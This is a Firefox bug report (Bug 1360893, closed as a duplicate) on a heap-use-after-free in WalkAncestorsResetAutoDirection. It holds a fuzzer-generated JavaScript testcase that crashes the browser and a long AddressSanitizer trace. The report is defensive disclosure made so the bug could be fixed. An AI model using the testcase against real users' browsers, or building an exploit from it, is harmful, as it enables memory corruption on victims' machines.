Closed
Bug 1360893
Opened 8 years ago
Closed 8 years ago
heap-use-after-free in mozilla::WalkAncestorsResetAutoDirection
Categories
(Core :: DOM: Core & HTML, defect)
Core
DOM: Core & HTML
Tracking
()
RESOLVED
DUPLICATE
of bug 1346590
People
(Reporter: nils, Assigned: smaug)
Details
(4 keywords)
Attachments
(2 files)
The following testcase crashes the latest ASAN build of Firefox:
<script>
function start() {
o0=document;
o2=document.body;
o4=document.documentElement;
o5=document.createRange();
o6=getSelection();
o12=document.createElement('marquee');
o12.appendChild(o4);
o20=document.createElement('bdi');
o5.surroundContents(o20);
o80=document.createElement('marquee');
o80.addEventListener('DOMAttrModified',fun0);
document.documentElement.appendChild(o80);
o85=document.createElement('form');
o0.documentElement.appendChild(o85);
}
var c=0;
function fun0() {
c++;
if(c == 1) {
o116=document.createElement('head');
o0.documentElement.appendChild(o116);
o117=document.createElement('style');
o116.appendChild(o117);
o80.setAttribute('height','8388608vmax');
o131=document.createElement('input');
} else if(c == 3) {
o80.id='id24';
document.documentElement.appendChild(o131);
document.documentElement.style.transform='scale(0.0001)';
document.documentElement.animate([{},{}],20);
fuzzPriv.CC();
document.documentElement.appendChild(o116);
} else if(c == 4) {
o0.designMode='on';
o2.style.position='fixed';
o85.appendChild(o131);
document.documentElement.appendChild(o2);
o131.type='submit';
o116.after(undefined);
o6.modify('move', 'forward','character');
document.documentElement.setAttribute('dir','auto');
}
}
</script>
<body onload="start()">
</body>
=================================================================
==8773==ERROR: AddressSanitizer: heap-use-after-free on address 0x60d0004220e0 at pc 0x7fca5647c270 bp 0x7ffcdc1449f0 sp 0x7ffcdc1449e8
READ of size 4 at 0x60d0004220e0 thread T0
#0 0x7fca5647c26f in GetBoolFlag /home/worker/workspace/build/src/dom/base/nsINode.h:1603:12
#1 0x7fca5647c26f in HasTextNodeDirectionalityMap /home/worker/workspace/build/src/dom/base/nsINode.h:1690
#2 0x7fca5647c26f in RemoveElementFromMap /home/worker/workspace/build/src/dom/base/DirectionalityUtils.cpp:556
#3 0x7fca5647c26f in mozilla::WalkAncestorsResetAutoDirection(mozilla::dom::Element*, bool) /home/worker/workspace/build/src/dom/base/DirectionalityUtils.cpp:666
#4 0x7fca56480bb9 in mozilla::SetDirOnBind(mozilla::dom::Element*, nsIContent*) /home/worker/workspace/build/src/dom/base/DirectionalityUtils.cpp:999:7
#5 0x7fca5649384a in mozilla::dom::Element::BindToTree(nsIDocument*, nsIContent*, nsIContent*, bool) /home/worker/workspace/build/src/dom/base/Element.cpp:1604:5
#6 0x7fca587fcb7e in nsGenericHTMLElement::BindToTree(nsIDocument*, nsIContent*, nsIContent*, bool) /home/worker/workspace/build/src/dom/html/nsGenericHTMLElement.cpp:480:43
#7 0x7fca58786659 in mozilla::dom::HTMLSharedElement::BindToTree(nsIDocument*, nsIContent*, nsIContent*, bool) /home/worker/workspace/build/src/dom/html/HTMLSharedElement.cpp:286:39
#8 0x7fca56769866 in nsINode::doInsertChildAt(nsIContent*, unsigned int, bool, nsAttrAndChildArray&) /home/worker/workspace/build/src/dom/base/nsINode.cpp:1608:14
#9 0x7fca5676ffb0 in nsINode::ReplaceOrInsertBefore(bool, nsINode*, nsINode*, mozilla::ErrorResult&) /home/worker/workspace/build/src/dom/base/nsINode.cpp:2510:14
#10 0x7fca56de4429 in InsertBefore /home/worker/workspace/build/src/dom/base/nsINode.h:1825:12
#11 0x7fca56de4429 in AppendChild /home/worker/workspace/build/src/dom/base/nsINode.h:1829
#12 0x7fca56de4429 in mozilla::dom::NodeBinding::appendChild(JSContext*, JS::Handle<JSObject*>, nsINode*, JSJitMethodCallArgs const&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/NodeBinding.cpp:856
#13 0x7fca5804afde in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2954:13
#14 0x7fca5d841aa3 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:291:15
#15 0x7fca5d841aa3 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:470
#16 0x7fca5d82a64f in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:521:12
#17 0x7fca5d82a64f in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3025
#18 0x7fca5d8105a8 in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:410:12
#19 0x7fca5d841c28 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:488:15
#20 0x7fca5d842452 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:534:10
#21 0x7fca5e1d717b in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/jsapi.cpp:2891:12
#22 0x7fca57aadb37 in mozilla::dom::EventListener::HandleEvent(JSContext*, JS::Handle<JS::Value>, mozilla::dom::Event&, mozilla::ErrorResult&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/EventListenerBinding.cpp:47:8
#23 0x7fca5840ba5f in HandleEvent<mozilla::dom::EventTarget *> /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventListenerBinding.h:65:12
#24 0x7fca5840ba5f in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1134
#25 0x7fca5840d863 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1311:20
#26 0x7fca583ee40a in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:488:14
#27 0x7fca583f1522 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:825:9
#28 0x7fca583c072a in mozilla::EventDispatcher::DispatchDOMEvent(nsISupports*, mozilla::WidgetEvent*, nsIDOMEvent*, nsPresContext*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:894:12
#29 0x7fca567679f1 in nsINode::DispatchEvent(nsIDOMEvent*, bool*) /home/worker/workspace/build/src/dom/base/nsINode.cpp:1337:5
#30 0x7fca5839930b in mozilla::AsyncEventDispatcher::Run() /home/worker/workspace/build/src/dom/events/AsyncEventDispatcher.cpp:54:12
#31 0x7fca562c82ef in nsContentUtils::RemoveScriptBlocker() /home/worker/workspace/build/src/dom/base/nsContentUtils.cpp:5407:15
#32 0x7fca56679883 in nsDocument::EndUpdate(unsigned int) /home/worker/workspace/build/src/dom/base/nsDocument.cpp:5092:3
#33 0x7fca5883bcac in nsHTMLDocument::EndUpdate(unsigned int) /home/worker/workspace/build/src/dom/html/nsHTMLDocument.cpp:2495:15
#34 0x7fca5a230efd in ~mozAutoDocConditionalContentUpdateBatch /home/worker/workspace/build/src/dom/base/mozAutoDocUpdate.h:83:18
#35 0x7fca5a230efd in ModifyDeclaration<(lambda at /home/worker/workspace/build/src/layout/style/nsDOMCSSDeclaration.cpp:346:5), (lambda at /home/worker/workspace/build/src/layout/style/nsDOMCSSDeclaration.cpp:352:5)> /home/worker/workspace/build/src/layout/style/nsDOMCSSDeclaration.cpp:338
#36 0x7fca5a230efd in nsDOMCSSDeclaration::ParsePropertyValue(nsCSSPropertyID, nsAString const&, bool) /home/worker/workspace/build/src/layout/style/nsDOMCSSDeclaration.cpp:345
#37 0x7fca56b71c4d in SetWidth /home/worker/workspace/build/src/layout/style/nsCSSPropList.h:4461:1
#38 0x7fca56b71c4d in mozilla::dom::CSS2PropertiesBinding::set_width(JSContext*, JS::Handle<JSObject*>, nsDOMCSSDeclaration*, JSJitSetterCallArgs) /home/worker/workspace/build/src/obj-firefox/dom/bindings/CSS2PropertiesBinding.cpp:44519
#39 0x7fca5804a87c in mozilla::dom::GenericBindingSetter(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2922:8
#40 0x7fca5d841aa3 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:291:15
#41 0x7fca5d841aa3 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:470
#42 0x7fca5d8437b9 in InternalCall /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:515:12
#43 0x7fca5d8437b9 in Call /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:534
#44 0x7fca5d8437b9 in js::CallSetter(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::Handle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:663
#45 0x7fca5e71b906 in SetExistingProperty /home/worker/workspace/build/src/js/src/vm/NativeObject.cpp:2432:10
#46 0x7fca5e71b906 in js::NativeSetProperty(JSContext*, JS::Handle<js::NativeObject*>, JS::Handle<jsid>, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::QualifiedBool, JS::ObjectOpResult&) /home/worker/workspace/build/src/js/src/vm/NativeObject.cpp:2467
#47 0x7fca5e41fa7a in SetProperty /home/worker/workspace/build/src/js/src/vm/NativeObject.h:1459:12
#48 0x7fca5e41fa7a in js::SetPropertyIgnoringNamedGetter(JSContext*, JS::Handle<JSObject*>, JS::Handle<jsid>, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::Handle<JS::PropertyDescriptor>, JS::ObjectOpResult&) /home/worker/workspace/build/src/js/src/proxy/BaseProxyHandler.cpp:182
#49 0x7fca58055f24 in mozilla::dom::DOMProxyHandler::set(JSContext*, JS::Handle<JSObject*>, JS::Handle<jsid>, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::ObjectOpResult&) const /home/worker/workspace/build/src/dom/bindings/DOMJSProxyHandler.cpp:258:10
#50 0x7fca5e451873 in js::Proxy::set(JSContext*, JS::Handle<JSObject*>, JS::Handle<jsid>, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::ObjectOpResult&) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:384:21
#51 0x7fca5e33dc8d in JSObject::nonNativeSetProperty(JSContext*, JS::Handle<JSObject*>, JS::Handle<jsid>, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::ObjectOpResult&) /home/worker/workspace/build/src/js/src/jsobj.cpp:1049:12
#52 0x7fca5d82368e in SetProperty /home/worker/workspace/build/src/js/src/vm/NativeObject.h:1458:16
#53 0x7fca5d82368e in SetPropertyOperation /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:244
#54 0x7fca5d82368e in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2816
#55 0x7fca5d8105a8 in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:410:12
#56 0x7fca5d841c28 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:488:15
#57 0x7fca5d842452 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:534:10
#58 0x7fca5e1d52f3 in JS_CallFunctionValue(JSContext*, JS::Handle<JSObject*>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/jsapi.cpp:2832:12
#59 0x7fca5993a236 in Call /home/worker/workspace/build/src/obj-firefox/dist/include/jsapi.h:3426:14
#60 0x7fca5993a236 in nsXBLProtoImplAnonymousMethod::Execute(nsIContent*, JSAddonId*) /home/worker/workspace/build/src/dom/xbl/nsXBLProtoImplMethod.cpp:331
#61 0x7fca5990548e in nsXBLBinding::ExecuteAttachedHandler() /home/worker/workspace/build/src/dom/xbl/nsXBLBinding.cpp:623:19
#62 0x7fca5990529c in nsBindingManager::ProcessAttachedQueueInternal(unsigned int) /home/worker/workspace/build/src/dom/xbl/nsBindingManager.cpp:424:16
#63 0x7fca5a49defd in ProcessAttachedQueue /home/worker/workspace/build/src/dom/xbl/nsBindingManager.h:105:5
#64 0x7fca5a49defd in mozilla::PresShell::DoFlushPendingNotifications(mozilla::ChangesToFlush) /home/worker/workspace/build/src/layout/base/PresShell.cpp:4179
#65 0x7fca5a4138b8 in FlushPendingNotifications /home/worker/workspace/build/src/layout/base/nsIPresShell.h:599:5
#66 0x7fca5a4138b8 in nsRefreshDriver::Tick(long, mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:1823
#67 0x7fca5a41c82e in WillRefresh /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:2167:5
#68 0x7fca5a41c82e in non-virtual thunk to nsRefreshDriver::WillRefresh(mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:2162
#69 0x7fca5a412465 in nsRefreshDriver::Tick(long, mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:1789:12
#70 0x7fca5a41be9c in nsRefreshDriver::FinishedWaitingForTransaction() /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:2088:5
#71 0x7fca55cb5a17 in mozilla::layers::ClientLayerManager::DidComposite(unsigned long, mozilla::TimeStamp const&, mozilla::TimeStamp const&) /home/worker/workspace/build/src/gfx/layers/client/ClientLayerManager.cpp:517:30
#72 0x7fca55d9267b in mozilla::layers::CompositorBridgeChild::RecvDidComposite(unsigned long const&, unsigned long const&, mozilla::TimeStamp const&, mozilla::TimeStamp const&) /home/worker/workspace/build/src/gfx/layers/ipc/CompositorBridgeChild.cpp:588:8
#73 0x7fca5515a8a6 in mozilla::layers::PCompositorBridgeChild::OnMessageReceived(IPC::Message const&) /home/worker/workspace/build/src/obj-firefox/ipc/ipdl/PCompositorBridgeChild.cpp:1590:20
#74 0x7fca54b6e4f4 in mozilla::ipc::MessageChannel::DispatchAsyncMessage(IPC::Message const&) /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:2019:25
#75 0x7fca54b6b387 in mozilla::ipc::MessageChannel::DispatchMessage(IPC::Message&&) /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1954:17
#76 0x7fca54b6d094 in mozilla::ipc::MessageChannel::RunMessage(mozilla::ipc::MessageChannel::MessageTask&) /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1823:5
#77 0x7fca54b6d6c6 in mozilla::ipc::MessageChannel::MessageTask::Run() /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1856:15
#78 0x7fca53de94f0 in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1270:14
#79 0x7fca53de5f38 in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:393:10
#80 0x7fca54b764c1 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:96:21
#81 0x7fca54ad99c0 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:10
#82 0x7fca54ad99c0 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
#83 0x7fca54ad99c0 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
#84 0x7fca59d7734f in nsBaseAppShell::Run() /home/worker/workspace/build/src/widget/nsBaseAppShell.cpp:156:27
#85 0x7fca5d1c14d1 in nsAppStartup::Run() /home/worker/workspace/build/src/toolkit/components/startup/nsAppStartup.cpp:283:30
#86 0x7fca5d38154e in XREMain::XRE_mainRun() /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4540:22
#87 0x7fca5d382efa in XREMain::XRE_main(int, char**, mozilla::BootstrapConfig const&) /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4720:8
#88 0x7fca5d3840ec in XRE_main(int, char**, mozilla::BootstrapConfig const&) /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4813:21
#89 0x4eb3c3 in do_main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:236:22
#90 0x4eb3c3 in main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:307
#91 0x7fca6f54f82f in __libc_start_main /build/glibc-9tT8Do/glibc-2.23/csu/../csu/libc-start.c:291
#92 0x41cf18 in _start (/home/nils/fuzzer3/firefox/firefox+0x41cf18)
0x60d0004220e0 is located 48 bytes inside of 136-byte region [0x60d0004220b0,0x60d000422138)
freed by thread T0 here:
#0 0x4bb44b in __interceptor_free /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:47:3
#1 0x7fca53c95f57 in SnowWhiteKiller::~SnowWhiteKiller() /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2665:25
#2 0x7fca53c95b57 in nsCycleCollector::FreeSnowWhite(bool) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2840:3
#3 0x7fca53c9bfd0 in nsCycleCollector::BeginCollection(ccType, nsICycleCollectorListener*) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3841:3
#4 0x7fca53c9b7f1 in nsCycleCollector::Collect(ccType, js::SliceBudget&, nsICycleCollectorListener*, bool) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3663:9
#5 0x7fca53c9e4d5 in nsCycleCollector_collect(nsICycleCollectorListener*) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:4199:21
#6 0x7fca56783d3c in nsJSContext::CycleCollectNow(nsICycleCollectorListener*, int) /home/worker/workspace/build/src/dom/base/nsJSEnvironment.cpp:1451:3
#7 0x7fca5630234d in nsDOMWindowUtils::CycleCollect(nsICycleCollectorListener*, int) /home/worker/workspace/build/src/dom/base/nsDOMWindowUtils.cpp:1341:3
#8 0x7fca53e038a1 in NS_InvokeByIndex /home/worker/workspace/build/src/xpcom/reflect/xptcall/md/unix/xptcinvoke_asm_x86_64_unix.S:129
#9 0x7fca5549ae5b in Invoke /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1996:12
#10 0x7fca5549ae5b in Call /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1315
#11 0x7fca5549ae5b in XPCWrappedNative::CallMethod(XPCCallContext&, XPCWrappedNative::CallMode) /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1282
#12 0x7fca554a1f3f in XPC_WN_CallMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNativeJSOps.cpp:982:12
#13 0x7fca5d841aa3 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:291:15
#14 0x7fca5d841aa3 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:470
#15 0x7fca5d82a64f in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:521:12
#16 0x7fca5d82a64f in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3025
#17 0x7fca5d8105a8 in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:410:12
#18 0x7fca5d841c28 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:488:15
#19 0x7fca5d842452 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:534:10
#20 0x7fca5e1d52f3 in JS_CallFunctionValue(JSContext*, JS::Handle<JSObject*>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/jsapi.cpp:2832:12
#21 0x7fca553c48fb in xpc::FunctionForwarder(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/xpconnect/src/ExportHelpers.cpp:319:18
#22 0x7fca5d841aa3 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:291:15
#23 0x7fca5d841aa3 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:470
#24 0x7fca5d82a64f in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:521:12
#25 0x7fca5d82a64f in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3025
#26 0x7fca5d8105a8 in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:410:12
#27 0x7fca5d841c28 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:488:15
#28 0x7fca5d842452 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:534:10
#29 0x7fca5e1d717b in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/jsapi.cpp:2891:12
#30 0x7fca57aadb37 in mozilla::dom::EventListener::HandleEvent(JSContext*, JS::Handle<JS::Value>, mozilla::dom::Event&, mozilla::ErrorResult&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/EventListenerBinding.cpp:47:8
#31 0x7fca5840ba5f in HandleEvent<mozilla::dom::EventTarget *> /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventListenerBinding.h:65:12
#32 0x7fca5840ba5f in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1134
#33 0x7fca5840d863 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1311:20
#34 0x7fca583ee40a in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:488:14
#35 0x7fca583f1522 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:825:9
#36 0x7fca583c072a in mozilla::EventDispatcher::DispatchDOMEvent(nsISupports*, mozilla::WidgetEvent*, nsIDOMEvent*, nsPresContext*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:894:12
previously allocated by thread T0 here:
#0 0x4bb79c in malloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:64:3
#1 0x4ec75d in moz_xmalloc /home/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:83:17
#2 0x7fca5a96eaae in operator new /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:194:12
#3 0x7fca5a96eaae in nsGfxButtonControlFrame::CreateAnonymousContent(nsTArray<nsIAnonymousContentCreator::ContentInfo>&) /home/worker/workspace/build/src/layout/forms/nsGfxButtonControlFrame.cpp:63
#4 0x7fca5a96f54f in non-virtual thunk to nsGfxButtonControlFrame::CreateAnonymousContent(nsTArray<nsIAnonymousContentCreator::ContentInfo>&) /home/worker/workspace/build/src/layout/forms/nsGfxButtonControlFrame.cpp:57:26
#5 0x7fca5a51f96e in nsCSSFrameConstructor::GetAnonymousContent(nsIContent*, nsIFrame*, nsTArray<nsIAnonymousContentCreator::ContentInfo>&) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:4232:26
#6 0x7fca5a51347a in nsCSSFrameConstructor::ProcessChildren(nsFrameConstructorState&, nsIContent*, nsStyleContext*, nsContainerFrame*, bool, nsFrameItems&, bool, PendingBinding*, nsIFrame*) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:11119:3
#7 0x7fca5a52890a in nsCSSFrameConstructor::ConstructFrameFromItemInternal(nsCSSFrameConstructor::FrameConstructionItem&, nsFrameConstructorState&, nsContainerFrame*, nsFrameItems&) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:4087:9
#8 0x7fca5a5331e2 in nsCSSFrameConstructor::ConstructFramesFromItem(nsFrameConstructorState&, nsCSSFrameConstructor::FrameConstructionItemList::Iterator&, nsContainerFrame*, nsFrameItems&) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:6269:3
#9 0x7fca5a540ec5 in ConstructFramesFromItemList /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:10900:5
#10 0x7fca5a540ec5 in nsCSSFrameConstructor::ContentAppended(nsIContent*, nsIContent*, bool, bool, TreeMatchContext*) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:7730
#11 0x7fca5a4a0f0e in ContentAppended /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.h:245:5
#12 0x7fca5a4a0f0e in mozilla::PresShell::ContentAppended(nsIDocument*, nsIContent*, nsIContent*, int) /home/worker/workspace/build/src/layout/base/PresShell.cpp:4408
#13 0x7fca567b308e in nsNodeUtils::ContentAppended(nsIContent*, nsIContent*, int) /home/worker/workspace/build/src/dom/base/nsNodeUtils.cpp:167:3
#14 0x7fca567698a2 in nsINode::doInsertChildAt(nsIContent*, unsigned int, bool, nsAttrAndChildArray&) /home/worker/workspace/build/src/dom/base/nsINode.cpp:1627:7
#15 0x7fca5676ffb0 in nsINode::ReplaceOrInsertBefore(bool, nsINode*, nsINode*, mozilla::ErrorResult&) /home/worker/workspace/build/src/dom/base/nsINode.cpp:2510:14
#16 0x7fca56de4429 in InsertBefore /home/worker/workspace/build/src/dom/base/nsINode.h:1825:12
#17 0x7fca56de4429 in AppendChild /home/worker/workspace/build/src/dom/base/nsINode.h:1829
#18 0x7fca56de4429 in mozilla::dom::NodeBinding::appendChild(JSContext*, JS::Handle<JSObject*>, nsINode*, JSJitMethodCallArgs const&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/NodeBinding.cpp:856
#19 0x7fca5804afde in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2954:13
#20 0x7fca5d841aa3 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:291:15
#21 0x7fca5d841aa3 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:470
#22 0x7fca5d82a64f in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:521:12
#23 0x7fca5d82a64f in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3025
#24 0x7fca5d8105a8 in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:410:12
#25 0x7fca5d841c28 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:488:15
#26 0x7fca5d842452 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:534:10
#27 0x7fca5e1d717b in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/jsapi.cpp:2891:12
#28 0x7fca57aadb37 in mozilla::dom::EventListener::HandleEvent(JSContext*, JS::Handle<JS::Value>, mozilla::dom::Event&, mozilla::ErrorResult&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/EventListenerBinding.cpp:47:8
